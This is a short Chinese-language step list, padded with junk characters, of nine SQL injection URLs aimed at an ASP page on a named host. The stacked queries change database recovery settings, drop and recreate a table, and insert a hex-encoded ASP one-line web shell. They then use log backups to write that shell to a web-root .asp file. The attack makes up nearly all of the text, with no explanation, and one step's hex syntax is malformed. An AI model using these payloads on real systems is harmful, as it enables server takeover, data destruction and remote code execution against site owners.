第一步) A8 X# a, n5 ^) ?/ r/ @
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--2 u- e( C1 E% G/ `6 d9 Y5 @
3 H/ g# E% s. b v* [第二步:
' v' I5 L d% H0 R$ l* y9 t% j Z& Dhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
6 v, T: E, G; j" x4 E& O
0 j' L" l6 J' \$ Z+ W0 [第三步
7 ]6 \4 M+ V$ m6 |http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--: ]; `8 J: p5 e+ ?$ H) p1 ]
) o( ^; Q$ j7 [第四步
5 F1 }+ H) b [http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
: S1 K. i7 z. \, Z8 O
( ]+ s" L* e! h3 x- Z& t2 T第五步4 C3 ?, x. I- ]) Z9 B4 n
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
& u+ y2 m" S) g4 a6 j- j {) r/ y% h0 V2 A
第六步7 {( |( {; U9 U6 l7 d* \) _6 C; U
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
/ ^* z, L* f) o N$ t( h* d+ u2 ?; O1 t4 g* m* ?' A5 Q
第七步1 U& D1 ~) J3 m6 I8 M. G1 L. a) m
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
" u; k) L; s" ]1 k. h% D; d4 y0 G7 ]
第八步# k) O: k2 e* R8 p! x" ?
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
( @8 ~ e) i! D8 \5 k! l, x/ s% J* K4 r; T- ^/ g9 @- R
第九步
" ?, E! U) c( [. `5 dhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--* @6 c1 T) _& O# Z( d0 O
|